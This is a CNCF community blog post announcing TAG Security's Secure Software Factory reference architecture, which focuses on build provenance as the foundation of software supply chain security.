Community post by Alexander Floyd Marshall from TAG Security

Almost a year ago the CNCF published its “Software Supply Chain Best Practices” guide, detailing over 50 ways to improve cloud-native software supply chains. That guide referenced the concept of a “Secure Software Factory,” but not how to make one.

Today, we are addressing that gap with the publication of the Secure Software Factory reference architecture, a follow-up work by the CNCF Technical Advisory Group (TAG) for Security’s Supply Chain Working Group. The reference architecture presents both (a) the conceptual design of a secure software factory (what its components are and what they do) and (b) a model for how to implement one using open source tools available in the ecosystem today.

The challenge of software supply chain security continues to be a prominent area of research and discussion. In the year since CNCF’s “Best Practices” publication, we have seen an Executive Order on improving cybersecurity that includes a number of elements targeting software supply chains, the emergence of the SLSA framework, and numerous developments around improving the security of popular software distribution mechanisms (including, this week, Kubernetes). Alongside these welcome developments, supply chain attacks have continued to grow in prominence and frequency.

Supply chain security is a multi-faceted and complex challenge. While the “Best Practices” publication covered a wide spectrum of the problem space, in this reference architecture we have narrowed our focus on the question of provenance, defined in the paper as “assurance that existing assumptions of where and how an artifact originates from are true and that the artifact or its accompanying metadata have not been tampered with during the build or delivery processes.” This emphasis was chosen for three reasons. First, existing tooling supplies much of the necessary components to develop robust assurances of provenance in a software factory. Second, the functionality of a software factory in particular (being, ultimately, a build pipeline) is highly conducive to collecting metadata attesting to the provenance of a build. Third, and perhaps most importantly, provenance provides a foundation for other areas of concern in supply chain security. If you don’t trust the provenance of the evidence, why would you trust the claims the evidence is making? Thus, having robust assurance about the provenance of an artifact and the metadata that accompanies it is a necessary prerequisite to being able to trust that other claims about the security of that artifact are meaningful.

The reference architecture continues the work of the TAG-Security (affectionately, the STAG), including the “Cloud Native Security Whitepaper” (version 2), the “Cloud Native Security Lexicon”, the “Best Practices for Software Supply Chains” paper, ongoing work providing security reviews and guidance to CNCF project teams, and more. If you would like to contribute to the work of the STAG, you can find us in the tag-security channel in CNCF’s Slack.